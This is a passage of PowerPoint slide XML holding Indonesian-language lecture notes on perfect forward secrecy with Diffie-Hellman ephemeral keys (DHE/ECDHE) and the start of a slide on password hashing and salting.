          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertukaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sempurna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (PFS). PFS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perjanjian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Diffie-Hellman (D-H) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server. Diffie-Hellman </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Alice dan Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perjanjian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merahasiakannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Mallory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai-nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipertukarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keaslian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuktikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>depan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterjemahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direkam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar-besaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptanalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>percakapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. PFS yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>aritmatika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> modular yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ditunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pada diagram </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Diffie-Hellman Ephemeral (DHE). PFS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Elliptic Curve DHE (ECDHE).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1389518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Salting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transmisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kembali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
